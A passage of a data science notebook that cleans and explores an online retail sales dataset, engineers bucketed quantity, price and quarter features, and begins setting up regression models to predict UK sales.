data."},{"metadata":{"id":"lqlGgcdiqAos","colab_type":"text"},"cell_type":"markdown","source":"# 2. Exploratory data analysis"},{"metadata":{},"cell_type":"markdown","source":"Every data science project starts with EDA as we have to understand what do we have to deal with. I divide EDA into 2 types: visual and numerical. Let's start with numerical as the simple pndas method *.describe()* gives us a lot of useful information."},{"metadata":{"id":"G0XGUAZFrk6v","colab_type":"text"},"cell_type":"markdown","source":"## 2.1. Quick statistical overview"},{"metadata":{"id":"pE4rxL-ZfwAe","colab_type":"code","outputId":"ef3791d5-e67f-4645-d52f-3ba4200d7fda","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"LOSySaN7qUdX","colab_type":"text"},"cell_type":"markdown","source":"Just a quick look at data with *.describe()* method gives us a lot of space to think. We see negative quantities and prices, we can see that not all records have CustomerID data, we can also see that the majority of transactions are for quantites from 3 to 10 items, majority of items have price up to 5 pounds and that we have a bunch of huge outliers we will have to deal with later."},{"metadata":{"id":"r_MIrqRYrqrG","colab_type":"text"},"cell_type":"markdown","source":"## 2.2. Dealing with types"},{"metadata":{},"cell_type":"markdown","source":"*.read_csv()* method performs basic type check, but it doesn't do that perfectly. That's why it is much better to deal with data types in our dataframe before any modifications to prevent additional difficulties. Every pandas dataframe has an attribute *.dtypes* which will help us understand what we currently have and what data has to be casted to correct types."},{"metadata":{"id":"XY4J_0KBqJGe","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":181},"outputId":"a38be5ea-091e-4dc1-fb56-1b6b739e088e","trusted":true},"cell_type":"code","source":"df.dtypes","execution_count":null,"outputs":[]},{"metadata":{"id":"iRgA1W66rTtM","colab_type":"text"},"cell_type":"markdown","source":"If we have datetime data it's better to cast it to datetime type. We don't touch InvoiceNo for now as it seems like data in this column has not only numbers. (we saw just first 5 rows, while pandas during import scanned all the data and found that the type here is not numerical)."},{"metadata":{"id":"qQ6gDvmV8a69","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\ndf = df.set_index('InvoiceDate')","execution_count":null,"outputs":[]},{"metadata":{"id":"UWSslxBNrgqG","colab_type":"text"},"cell_type":"markdown","source":"## 2.3. Dealing with null values"},{"metadata":{},"cell_type":"markdown","source":"Next and very important step is dealing with missing values. Normally if you encounter null values in the dataset you have to understand nature of those null values and possible impact they could have on the model. There are few strategies that we can use to fix our issue with null values: \n* delete rows with null values\n* delete the feature with null values\n* impute data with mean or median values or use another imputing strategy (method *.fillna()*)\n\nLet's check out what we have here."},{"metadata":{"id":"5TDxDE_NgR-_","colab_type":"code","outputId":"175b502c-7ac3-4cea-b30f-fb4e9f7afb1a","colab":{"base_uri":"https://localhost:8080/","height":163},"trusted":true},"cell_type":"code","source":"df.isnull().sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"lmL-TjEIr8Tz","colab_type":"text"},"cell_type":"markdown","source":"CustomerID has too much null values and this feature cannot predict a lot so we can just drop it. Also it could be reasonable to create another feature \"Amount of orders per customer\", but.... next time ;)"},{"metadata":{"id":"qZHLLtsRqPTA","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df = df.drop(columns=['CustomerID'])","execution_count":null,"outputs":[]},{"metadata":{"id":"_oFg_pKssgLp","colab_type":"text"},"cell_type":"markdown","source":"Let's check out what kind of nulls we have in Description"},{"metadata":{"id":"rQkkpcUnsqef","colab_type":"code","outputId":"6d5126e2-7b58-459a-a71c-cd1de52f6e10","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df[df['Description'].isnull()].head()","execution_count":null,"outputs":[]},{"metadata":{"id":"RrpxM_SasxCU","colab_type":"text"},"cell_type":"markdown","source":"The data in these rows is pretty strange as UnitPrice is 0, so these orders do not generate any sales. I think, we can impute it with \"UNKNOWN ITEM\" at the moment and deal with those later during the analysis."},{"metadata":{"id":"eIIq-a31t3mm","colab_type":"code","outputId":"b788c188-bb34-47a5-c374-ba05b88fab66","colab":{"base_uri":"https://localhost:8080/","height":145},"trusted":true},"cell_type":"code","source":"df['Description'] = df['Description'].fillna('UNKNOWN ITEM')\ndf.isnull().sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"B_RRuBfHyzKm","colab_type":"text"},"cell_type":"markdown","source":"## 2.4. Checking out columns separately"},{"metadata":{},"cell_type":"markdown","source":"Also it makes sense to go feature by feature and check what pitfalls we have in our data and also to understand our numbers better. "},{"metadata":{"id":"rGmT3rxntRwp","colab_type":"text"},"cell_type":"markdown","source":"Let's continue checking Description column. Here we can see items that were bought most often. "},{"metadata":{"id":"2zRnyeufgBDa","colab_type":"code","outputId":"48a7535a-7265-4dd3-d53b-11e1f26ff41b","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['Description'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Here we can see our best selling products, items that appear in orders the most often. Also to make it visually more appealing let's create a bar chart for 15 top items."},{"metadata":{"id":"JuNgVd6PGt7Y","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":585},"outputId":"47fc5972-c3bb-4145-9209-19964ddcc9a2","trusted":true},"cell_type":"code","source":"item_counts = df['Description'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(item_counts.index, item_counts.values, palette=sns.cubehelix_palette(15))\nplt.ylabel(\"Counts\")\nplt.title(\"Which items were bought more often?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"df['Description'].value_counts().tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"pgxFvFL0xEL4","colab_type":"text"},"cell_type":"markdown","source":"We also notice from above code that valid items are normally uppercased and non-valid or cancelations are in lower case"},{"metadata":{"id":"0RMbj7vsu3kZ","colab_type":"code","outputId":"a79e7b03-11da-4cc8-9601-497123b134b7","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df[~df['Description'].str.isupper()]['Description'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Quick check of the case of letters in Description says that there are some units with lower case letters in their name and also that lower case records are for canceled items. Here we can understand that data management in the store can be improved."},{"metadata":{"id":"YxTPItIwJQTV","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":567},"outputId":"c2caac93-0726-4cb6-faf2-063ff23c612a","trusted":true},"cell_type":"code","source":"lcase_counts = df[~df['Description'].str.isupper()]['Description'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(lcase_counts.index, lcase_counts.values, palette=sns.color_palette(\"hls\", 15))\nplt.ylabel(\"Counts\")\nplt.title(\"Not full upper case items\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"FIdbxmgjxnV9","colab_type":"text"},"cell_type":"markdown","source":"ALso checking out stoke codes, looks like they are deeply correlated with descriptions - which makes perfect sense."},{"metadata":{"id":"Ifuzm9k3wiZC","colab_type":"code","outputId":"69b593a7-0512-43e8-dc00-fe637f110110","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['StockCode'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{"id":"mYNaQ_KmK6YH","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":416},"outputId":"45b22661-378f-4bbe-b1e1-9f912e240e84","trusted":true},"cell_type":"code","source":"stock_counts = df['StockCode'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(stock_counts.index, stock_counts.values, palette=sns.color_palette(\"GnBu_d\"))\nplt.ylabel(\"Counts\")\nplt.title(\"Which stock codes were used the most?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"CyIqQt3rx3eo","colab_type":"text"},"cell_type":"markdown","source":"Checking out also InvoiceNo feature."},{"metadata":{"id":"-07Q-Xp3xjSU","colab_type":"code","outputId":"9ade42df-5062-40a9-e649-58ccf31e4d77","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['InvoiceNo'].value_counts().tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"5aSNIrR4LnuS","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":416},"outputId":"bdbc0532-dd9b-4dc2-f1b2-f77a390e420e","trusted":true},"cell_type":"code","source":"inv_counts = df['InvoiceNo'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(inv_counts.index, inv_counts.values, palette=sns.color_palette(\"BuGn_d\"))\nplt.ylabel(\"Counts\")\nplt.title(\"Which invoices had the most items?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"swUMOF-fx5qy","colab_type":"code","outputId":"6e23df48-7cf8-4a4a-e980-aec224a8a6fb","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df[df['InvoiceNo'].str.startswith('C')].describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"hq-lWQhUyQQR","colab_type":"text"},"cell_type":"markdown","source":"Looks like Invoices that start with 'C' are the \"Canceling\"/\"Returning\" invoices. This resolves the mistery with negative quantities. \n\nAlthough, we should've gotten deeper into analysis of those returns, for the sake of simplicity let's just ignore those values for the moment.\n\nWe can actually start a separate project based on that data and predict the returning/cancelling rates for the store."},{"metadata":{"id":"yJI3a_ew1OKp","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df = df[~df['InvoiceNo'].str.startswith('C')]","execution_count":null,"outputs":[]},{"metadata":{"id":"08Bdxo0m0neI","colab_type":"code","outputId":"05306d9c-e047-4a7f-d722-74adbf3f8195","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"8czolNlTykMw","colab_type":"text"},"cell_type":"markdown","source":"During exploratory data analysis we can go back to the same operations and checks, just to understand how our actions affected the dataset. EDA is the series of repetitive tasks to understand better our data. And here, for example we get back to *.describe()* method to get an overall picture of our data after some manipulations. \n\nWe still see negative quantities and negative prices, let's get into those records.\n\n"},{"metadata":{"id":"A9i_--Qwq7Hm","colab_type":"code","outputId":"34f01616-e351-4299-9063-ee9f37b41dd8","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"# df[df['Quantity'] < 0]\ndf[df['Quantity'] < 0].head()","execution_count":null,"outputs":[]},{"metadata":{"id":"O7rxmQPd13Ob","colab_type":"text"},"cell_type":"markdown","source":"Here we can see that other \"Negative quantities\" appear to be damaged/lost/unknown items. Again, we will just ignore them for the sake of simplicity of analysis for this project."},{"metadata":{"id":"klcGgM0ZroQJ","colab_type":"code","outputId":"16a57920-5ffd-424a-bea0-0f659f54dee9","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df = df[df['Quantity'] > 0]\ndf.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"wkKCHTG82aPC","colab_type":"text"},"cell_type":"markdown","source":"We also see negative UnitPrice, which is not normal as well. Let's check this out."},{"metadata":{"id":"6inbAyKqrLlI","colab_type":"code","outputId":"d9da9005-0fdd-4c93-87b2-9e8ce268e388","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df[df['UnitPrice'] < 0].describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"acGrnc1WrVc7","colab_type":"code","outputId":"b5b15dc6-29e7-4955-c1d7-849cb3e275c2","colab":{"base_uri":"https://localhost:8080/","height":138},"trusted":true},"cell_type":"code","source":"df[df['UnitPrice'] == -11062.06]","execution_count":null,"outputs":[]},{"metadata":{"id":"0wOWI0WT2k06","colab_type":"text"},"cell_type":"markdown","source":"As there are just two rows, let's ignore them for the moment (description gives us enough warnings, althoug we still need some context to understand it better)"},{"metadata":{"id":"etvXHm7K29rg","colab_type":"code","outputId":"46e242c3-8d06-4499-d366-62d416d17655","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df = df[df['UnitPrice'] > 0]\ndf.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we have finished cleaning our data and removed all suspicious records we can start creating some new features for our model. Let's start with the most obvious one - Sales. We have quantities, we have prices - we can calculate the revenue."},{"metadata":{"id":"S2AxwWDJ3OFO","colab_type":"code","outputId":"f557fb65-da23-482a-8560-231c5710abfd","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df['Sales'] = df['Quantity'] * df['UnitPrice']\ndf.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"gYqYN2LszQro","colab_type":"text"},"cell_type":"markdown","source":"# 3. Visual EDA"},{"metadata":{"id":"afZL4I1q6vlo","colab_type":"code","outputId":"eb25f2bd-1466-482f-997a-f2ccfb717fcc","colab":{"base_uri":"https://localhost:8080/","height":406},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(3,6))\nsns.countplot(df[df['Country'] == 'United Kingdom']['Country'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"onb0ByML3dQe","colab_type":"code","outputId":"43bd565a-d12a-4ac6-c198-6043b065bbcc","colab":{"base_uri":"https://localhost:8080/","height":541},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\nsns.countplot(df[df['Country'] != 'United Kingdom']['Country'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"K79ODkHYznEr","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":35},"outputId":"7910c5a6-96f0-4d73-b6aa-0580b04163b1","trusted":true},"cell_type":"code","source":"uk_count = df[df['Country'] == 'United Kingdom']['Country'].count()\nall_count = df['Country'].count()\nuk_perc = uk_count/all_count\nprint(str('{0:.2f}%').format(uk_perc*100))","execution_count":null,"outputs":[]},{"metadata":{"id":"zVPKRDC-zWAW","colab_type":"text"},"cell_type":"markdown","source":"From above plots and calculations we can see that vast majority of sales were made in UK and just 8.49% went abroad. We can say our dataset is skewed to the UK side :D."},{"metadata":{"id":"uSCNB39c1p-K","colab_type":"text"},"cell_type":"markdown","source":"## 3.1. Detecting outliers"},{"metadata":{},"cell_type":"markdown","source":"There are few different methods to detect outliers: box plots, using [IQR](https://en.wikipedia.org/wiki/Interquartile_range), scatter plot also works in some cases (and this is one of those). Also, detecting outliers using scatter plot is pretty intuitive. You plot your data and remove data points that visually are definitely out of range. Like in the chart below."},{"metadata":{"id":"n0tRONoX7zV8","colab_type":"code","outputId":"b5956cde-dc7a-452a-d737-252efb18f632","colab":{"base_uri":"https://localhost:8080/","height":389},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\nplt.scatter(x=df.index, y=df['Sales'])","execution_count":null,"outputs":[]},{"metadata":{"id":"jB9G52F79ryZ","colab_type":"text"},"cell_type":"markdown","source":"Let's remove obvious outliers"},{"metadata":{"id":"WxEj3y-z9zHj","colab_type":"code","outputId":"75121918-2d46-4566-8561-8ad7724ad896","colab":{"base_uri":"https://localhost:8080/","height":438},"trusted":true},"cell_type":"code","source":"df = df[df['Sales'] < 25000]\nplt.figure(figsize=(18,6))\nplt.scatter(x=df.index, y=df['Sales'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"il5rP2rR10ao","colab_type":"text"},"cell_type":"markdown","source":"After removing obvious outliers we still see some values that are out of normal distribution. To understand better the distribution of our data let's check out different percentiles of our numeric features. "},{"metadata":{"id":"Wd6lkccmCXnY","colab_type":"code","outputId":"a7c2a5bf-e30f-4edb-be89-795b2ff1c191","colab":{"base_uri":"https://localhost:8080/","height":198},"trusted":true},"cell_type":"code","source":"df.quantile([0.05, 0.95, 0.98, 0.99, 0.999])","execution_count":null,"outputs":[]},{"metadata":{"id":"e0Xyxllp2ZI2","colab_type":"text"},"cell_type":"markdown","source":"We can see that if we remove top 2% of our data points we will get rid of absolute outliers and will have more balaced dataset."},{"metadata":{"id":"ntKRBQa-MZEt","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":330},"outputId":"9aea8dde-8243-460f-8133-a7d647d90ac5","trusted":true},"cell_type":"code","source":"df_quantile = df[df['Sales'] < 125]\nplt.scatter(x=df_quantile.index, y=df_quantile['Sales'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"BZ5zrj1JNaA7","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"e087d72d-ef1a-4694-a0ba-eb7a69506d71","trusted":true},"cell_type":"code","source":"df_quantile.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Looks like our data is almost ready for modelling. We performed a clean up, we removed outliers that were disturbing the balance of our dataset, we removed invalid records - now our data looks much better! and it doesn't lose it's value."},{"metadata":{"id":"PPX6LukY3Cpf","colab_type":"text"},"cell_type":"markdown","source":"## 3.2. Visually checking distribution of numeric features"},{"metadata":{"id":"zj1rJmD1NB8P","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":281},"outputId":"b380c7b0-21e7-45aa-db9c-ddf2beaac225","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['UnitPrice'] < 10]['UnitPrice'].values, kde=True, bins=10)","execution_count":null,"outputs":[]},{"metadata":{"id":"iV5Lv1YXUonz","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"96b5b822-dbe0-46ed-d6d3-03cc7165023e","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['UnitPrice'] < 5]['UnitPrice'].values, kde=True, bins=10, color='green')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we can see that vast majority of items sold in this store has low price range - 0 to 3 pounds. "},{"metadata":{"id":"MadAXAn0TuCZ","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"082d181e-a654-4a68-89a3-4dd761891705","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Quantity'] <= 30]['Quantity'], kde=True, bins=10, color='red')","execution_count":null,"outputs":[]},{"metadata":{"id":"uDPI8FLbUxRl","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"27f01b22-1973-475a-8164-80ce816b8c61","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Quantity'] <= 15]['Quantity'], kde=True, bins=10, color='orange')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we that people bought normally 1-5 items or 10-12 - maybe there were some kind of offers for sets?"},{"metadata":{"id":"NUSMODaWUXgm","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"a9a22872-3d5a-4e06-b1ee-40a4bab64e24","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Sales'] < 60]['Sales'], kde=True, bins=10, color='purple')","execution_count":null,"outputs":[]},{"metadata":{"id":"271Hrgm-U5FK","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"f133732c-ae41-4ca2-94a1-71677ed5d0e2","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Sales'] < 30]['Sales'], kde=True, bins=10, color='grey')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we can understand that majority of sales per order were in range 1-15 pounds each."},{"metadata":{"id":"MNCUZ2DO3mHM","colab_type":"text"},"cell_type":"markdown","source":"## 3.3. Analysing sales over time"},{"metadata":{"id":"KCPCF-ZsDHpL","colab_type":"code","outputId":"b983fc93-0851-4316-e873-164c7679061a","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df_ts = df[['Sales']]\ndf_ts.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see every invoice has it's own timestamp (definitely based on time the order was made). We can resample time data by, for example weeks, and try see if there is any patterns in our sales."},{"metadata":{"id":"k9vEWHcHEaND","colab_type":"code","outputId":"7f692faa-9857-42b7-a41a-5c2d83fefd9d","colab":{"base_uri":"https://localhost:8080/","height":326},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\ndf_resample = df_ts.resample('W').sum()\ndf_resample.plot()","execution_count":null,"outputs":[]},{"metadata":{"id":"zFi5bGs534oQ","colab_type":"text"},"cell_type":"markdown","source":"That week with 0 sales in January looks suspicious, let's check it closer"},{"metadata":{"id":"1QXCBgf8WQUD","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":348},"outputId":"55d754dc-79af-4722-bba6-726d6f7329a0","trusted":true},"cell_type":"code","source":"df_resample['12-2010':'01-2011']","execution_count":null,"outputs":[]},{"metadata":{"id":"U7o8UfRB4GLy","colab_type":"text"},"cell_type":"markdown","source":"Now it makes sense - possibly, during the New Year holidays period the store was closed and didn't process orders, that's why they didn't make any sales."},{"metadata":{"id":"NIpdfJcS4mbx","colab_type":"text"},"cell_type":"markdown","source":"# 4. Preparing data for modeling and feature creation"},{"metadata":{},"cell_type":"markdown","source":"Now it comes the most fun part of the project - building a model. To do this we will need to create few more additional features to make our model more sophisticated."},{"metadata":{"id":"Z26VIUm8VJ0M","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"acaee750-803a-4332-c724-9f2568620b51","trusted":true},"cell_type":"code","source":"df_clean = df[df['UnitPrice'] < 15]\ndf_clean.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"4ddHzAzmkAx9","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":235},"outputId":"8834df7a-f77b-4a7a-a50e-0e26afd503f4","trusted":true},"cell_type":"code","source":"df_clean.index","execution_count":null,"outputs":[]},{"metadata":{"id":"IJST6pYl47s6","colab_type":"text"},"cell_type":"markdown","source":"## 4.1. Quantity per invoice feature"},{"metadata":{},"cell_type":"markdown","source":"A feature that could influence the sales output could be \"Quantity per invoice\". Let's find the data for this feature."},{"metadata":{"id":"XeL8mapkXU3c","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_join = df_clean.groupby('InvoiceNo')[['Quantity']].sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"yB4Fqi0qf-tx","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"8be7a159-28ed-4e2e-8576-76f94311df48","trusted":true},"cell_type":"code","source":"df_join = df_join.reset_index()\ndf_join.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"4q88pvAuX2Rh","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":607},"outputId":"bb6ce533-2ee6-42e2-adaa-ea49e04720ac","trusted":true},"cell_type":"code","source":"df_clean['InvoiceDate'] = df_clean.index\ndf_clean = df_clean.merge(df_join, how='left', on='InvoiceNo')\ndf_clean = df_clean.rename(columns={'Quantity_x' : 'Quantity', 'Quantity_y' : 'QuantityInv'})\ndf_clean.tail(15)","execution_count":null,"outputs":[]},{"metadata":{"id":"FkOT2yPciD0Q","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"c0fbb47b-ff20-4189-8433-14a1a14f6663","trusted":true},"cell_type":"code","source":"df_clean.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"DDzWZ6K_o4z0","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_clean['InvoiceDate'] = pd.to_datetime(df_clean['InvoiceDate'])","execution_count":null,"outputs":[]},{"metadata":{"id":"2tQTQyu4pBaf","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":199},"outputId":"11c8b52d-9760-460c-e1e7-749defaf9e4f","trusted":true},"cell_type":"code","source":"df_clean.dtypes","execution_count":null,"outputs":[]},{"metadata":{"id":"BirwPlbT5SRb","colab_type":"text"},"cell_type":"markdown","source":"## 4.2. Bucketizing Quantity and UnitPrice features"},{"metadata":{"id":"AOfQmYrH5fxk","colab_type":"text"},"cell_type":"markdown","source":"Based on the EDA done previously we can group these features into 6 buckets for Quantity and 5 for UnitePrice using pandas .cut() method."},{"metadata":{"id":"PxLoYdjImDsy","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"9f1e0505-65aa-4ad8-c629-507e7ba6964d","trusted":true},"cell_type":"code","source":"bins_q = pd.IntervalIndex.from_tuples([(0, 2), (2, 5), (5, 8), (8, 11), (11, 14), (15, 5000)])\ndf_clean['QuantityRange'] = pd.cut(df_clean['Quantity'], bins=bins_q)\nbins_p = pd.IntervalIndex.from_tuples([(0, 1), (1, 2), (2, 3), (3, 4), (4, 20)])\ndf_clean['PriceRange'] = pd.cut(df_clean['UnitPrice'], bins=bins_p)\ndf_clean.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"v66wi4HE59RQ","colab_type":"text"},"cell_type":"markdown","source":"## 4.3. Extracting and bucketizing dates"},{"metadata":{"id":"FOZtgaSQ6McM","colab_type":"text"},"cell_type":"markdown","source":"We have noticed that depends on a season gifts sell differently: pick of sales is in the Q4, then it drastically drops in Q1 of the next year and continues to grow till its new pick in Q4 again. From this observation we can create another feature that could improve our model."},{"metadata":{"id":"yBChTJkks6Pq","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"9ae44644-c18e-4633-8649-68cb46bad8a7","trusted":true},"cell_type":"code","source":"df_clean['Month'] = df_clean['InvoiceDate'].dt.month\ndf_clean.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"jxsN8XZVqmgU","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"b4e4d754-b9b9-4707-8eb1-db31303cf422","trusted":true},"cell_type":"code","source":"bins_d = pd.IntervalIndex.from_tuples([(0,3),(3,6),(6,9),(9,12)])\ndf_clean['DateRange'] = pd.cut(df_clean['Month'], bins=bins_d, labels=['q1','q2','q3','q4'])\ndf_clean.tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"VV_-KJsD8AMi","colab_type":"text"},"cell_type":"markdown","source":"# 5. Building a model"},{"metadata":{"id":"zoj-cC6N6wHN","colab_type":"text"},"cell_type":"markdown","source":"## 5.1. Splitting data into UK and non-UK"},{"metadata":{"id":"LCuO7Bdz64di","colab_type":"text"},"cell_type":"markdown","source":"We have to analyze these 2 datasets separately to have more standardized data for a model, because there can be some patterns that work for other countries and do not for UK or vise versa. Also a hypothesis to test - does the model built for UK performs good on data for other countries? "},{"metadata":{"id":"xmWtfOhCvdft","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_uk = df_clean[df_clean['Country'] == 'United Kingdom']\ndf_abroad = df_clean[df_clean['Country'] != 'United Kingdom']","execution_count":null,"outputs":[]},{"metadata":{"id":"Jr4lhQyFvsH0","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"0af6cb14-195a-460d-bfd8-212a8625520c","trusted":true},"cell_type":"code","source":"df_uk.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"7m7-iaA-8HMk","colab_type":"text"},"cell_type":"markdown","source":"## 5.2. Extracting features and creating dummy variables"},{"metadata":{"id":"0J8hPy4HwW0X","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"b11bc87e-524c-49fe-cdab-c75f697166c1","trusted":true},"cell_type":"code","source":"df_uk_model = df_uk[['Sales', 'QuantityInv', 'QuantityRange', 'PriceRange', 'DateRange']]\ndf_uk_model.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"SZRq6C640Blc","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":215},"outputId":"5cc68aba-1928-4e80-c481-27f4b5434530","trusted":true},"cell_type":"code","source":"df_data = df_uk_model.copy()\ndf_data = pd.get_dummies(df_data, columns=['QuantityRange'], prefix='qr')\ndf_data = pd.get_dummies(df_data, columns=['PriceRange'], prefix='pr')\ndf_data = pd.get_dummies(df_data, columns=['DateRange'], prefix='dr')\ndf_data.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"f-SPb1vS8WJp","colab_type":"text"},"cell_type":"markdown","source":"## 5.3. Scaling"},{"metadata":{},"cell_type":"markdown","source":"As the majority of our features are in 0-1 range it would make sense to scale \"QuantityInv\" feature too. In general, scaling features is normally a good idea."},{"metadata":{"id":"pZknqQll1XwF","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"from sklearn.preprocessing import scale\ndf_data['QuantityInv'] = scale(df_data['QuantityInv'])","execution_count":null,"outputs":[]},{"metadata":{"id":"ubjfXWh18gyd","colab_type":"text"},"cell_type":"markdown","source":"## 5.4. Train-Test Split"},{"metadata":{},"cell_type":"markdown","source":"Now we have to split our data into train-test data to be able to train our model and validate its capabilities."},{"metadata":{"id":"PzvfoUoP1x3_","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"y = df_data['Sales']\nX = df_data.drop(columns=['Sales'])","execution_count":null,"outputs":[]},{"metadata":{"id":"PgddlfS31-EG","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"from sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state=42)","execution_count":null,"outputs":[]},{"metadata":{"id":"PuVn7UAz8vU0","colab_type":"text"},"cell_type":"markdown","source":"## 5.5. Testing and validating different models"},{"metadata":{},"cell_type":"markdown","source":"Here we use GridSearch and CrossValidation to test three types of regressors: Linear, DecisionTree and RandomForest. This can take a 